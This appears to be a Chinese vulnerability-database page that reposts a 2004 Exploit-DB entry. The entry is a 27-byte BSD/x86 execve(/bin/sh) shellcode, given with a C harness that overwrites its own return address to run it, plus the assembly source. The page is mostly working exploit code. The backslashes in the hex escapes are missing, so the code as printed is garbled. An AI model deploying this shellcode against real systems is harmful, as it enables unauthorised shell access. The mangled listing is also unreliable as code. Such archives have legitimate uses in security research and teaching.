BSD/x86 – execve(/bin/sh) Shellcode (27 bytes)

BSD/x86 – execve(/bin/sh) Shellcode (27 bytes)

漏洞ID 1054691 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-BSD/x86 – execve(/bin/sh) Shellcode (27 bytes)-安全小百科CVE编号 N/A
图片[2]-BSD/x86 – execve(/bin/sh) Shellcode (27 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 BSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13246
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* execve_sh.c by n0gada	
   27 bytes.
*/
#include <stdio.h>

char shellcode[]=
"xebx0dx5fx31xc0x50x89xe2"
"x52x57x54xb0x3bxcdx80xe8"
"xeexffxffxff/bin/sh";

int main(void)
{
 int *ret;

	printf("%dn",strlen(shellcode));	
	ret = (int *)&ret+2;
	*ret = (int)shellcode;

return 0;

}

/*********************************************
execve_sh.s

	.globl main
	main:
		jmp strings
	start:
		pop %edi
		xorl %eax,%eax
		push %eax
		movl %esp,%edx
		push %edx
		push %edi
		push %esp
		movb $0x3b,%al
		int $0x80

	strings: call start
		.string "/bin/sh"

*********************************************/

// milw0rm.com [2004-09-26]

相关推荐: Check Point VPN-1/FireWall-1绕过目录检测漏洞

Check Point VPN-1/FireWall-1绕过目录检测漏洞 漏洞ID 1206246 漏洞类型 未知 发布时间 2000-11-14 更新时间 2000-11-14 CVE编号 CVE-2000-0804 CNNVD-ID CNNVD-20001…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享